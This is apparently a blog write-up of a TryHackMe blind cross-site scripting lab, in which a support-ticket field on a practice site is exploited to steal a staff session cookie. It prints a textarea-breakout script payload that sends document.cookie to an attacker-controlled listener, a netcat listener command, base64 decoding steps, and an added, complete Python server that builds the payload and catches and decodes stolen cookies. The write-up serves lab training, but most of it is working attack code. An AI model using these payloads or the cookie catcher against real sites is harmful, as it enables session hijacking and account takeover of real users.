Jay Wandery
2 min read, May 5, 2023

Cross Site Scripting (XSS) | TryHackMe.com

In this exercise we are going to look at a practical example of a Blind XSS and attempt to decode the value of the staff-session cookie.

In this task you test for XSS on the Acme IT Support website by placing a payload in the support ticket form, capturing the staff cookie it sends back, and decoding the captured value with https://www.base64decode.org/

Step 1.

Create an account on Acme IT Support and open a new support ticket.

Viewing the page source shows that our message is rendered inside a <textarea> element, so a payload first has to close that element before a script can run. The following confirms it (the alert fires when the ticket is viewed):

</textarea><script>alert('THM');</script>

Now that we are sure the field is vulnerable to XSS, we can build a payload that steals the cookie. Because this is a blind XSS, the ticket is viewed by a staff member in their own browser, so the payload must send document.cookie to a listener we control instead of showing it to us.

</textarea><script>fetch('http://ip_address:port?cookie=' + btoa(document.cookie));</script>

Before sending the payload, start a netcat listener on the same port the payload points at. ip_address must be the address of your attacking machine, reachable from the target's browser.

# nc -lnvp 9001
[screenshot: nc listening for connections]

Once a staff member views the ticket, the script runs in their browser and sends document.cookie (the cookies set for the site) to our listener, where it arrives as a base64 string in the query of the request. Now let's decode it.

You can decode the cookie in two ways.

  1. using https://www.base64decode.org/
  2. using the terminal:
echo 'cookie value' | base64 -d

Hurray! You have the staff-session value: 4AB305E55955197693F01D6F8FD2D321
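As an added example (not the room's code and not the original write-up's), here is a small Python catcher that does what the netcat listener plus the manual base64 step do in one go: it builds the same payload shape, receives the GET, pulls the cookie parameter out of the request line and decodes it into name/value pairs. The port follows the write-up's nc -lnvp 9001; the attacker address 10.10.10.10 and the cookie strings used for testing are made up for the demonstration.

```python
import base64
import binascii
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

# Assumptions for this example: the listener port matches the write-up's
# "nc -lnvp 9001"; ATTACKER_URL is a made-up address standing in for the
# http://ip_address:port placeholder in the payload.
LISTEN_PORT = 9001
ATTACKER_URL = f"http://10.10.10.10:{LISTEN_PORT}"


def build_payload(listener_url: str) -> str:
    """Same shape as the write-up's payload: close the <textarea> the message is
    rendered into, then fetch() our listener with document.cookie as a query
    parameter. btoa() is used because a raw cookie string contains ';', '=' and
    spaces that would break the URL."""
    return (
        "</textarea><script>fetch('"
        + listener_url
        + "?cookie=' + btoa(document.cookie));</script>"
    )


def encode_like_btoa(text: str) -> str:
    """What the browser's btoa() produces for a cookie string (Latin-1 bytes,
    standard base64 alphabet). Used here to build test input without a browser."""
    return base64.b64encode(text.encode("latin-1")).decode("ascii")


def extract_cookies(request_target: str) -> dict:
    """Decode the cookie from the request-target of the incoming GET, e.g.
    '/?cookie=c3RhZmYtc2Vzc2lvbj0...' as seen on the first line of the request.

    The query is split by hand rather than with parse_qs(): the payload does not
    percent-encode btoa()'s output, so a '+' in the base64 arrives literally, and
    parse_qs() would turn it into a space and corrupt the decode.
    """
    query = urlsplit(request_target).query
    encoded = ""
    for pair in query.split("&"):
        name, sep, value = pair.partition("=")  # first '=' only: base64 padding stays in value
        if sep and name == "cookie":
            encoded = unquote(value)             # handles %XX but leaves '+' alone
            break
    if not encoded:
        return {}
    try:
        raw = base64.b64decode(encoded, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return {}                                # not base64: someone poking the listener
    cookies = {}
    for part in raw.split(";"):                  # document.cookie looks like "a=1; b=2"
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


class CookieCatcher(BaseHTTPRequestHandler):
    """Stands in for the netcat listener: prints the decoded cookies and answers
    204 so the victim's browser has nothing to render and the request completes
    (with nc the fetch() just hangs until you close the listener)."""

    def do_GET(self):
        print(f"[+] {self.client_address[0]} -> {extract_cookies(self.path)}")
        self.send_response(204)
        self.end_headers()

    def log_message(self, *args):  # keep the output to the decoded cookies only
        pass


if __name__ == "__main__":
    print("payload:", build_payload(ATTACKER_URL))
    HTTPServer(("0.0.0.0", LISTEN_PORT), CookieCatcher).serve_forever()
```

Run it on the attacking machine, paste the printed payload into the ticket, and the decoded staff-session value appears as soon as the staff browser loads the ticket. Using a real HTTP responder rather than nc also means the victim's fetch() finishes cleanly instead of sitting open.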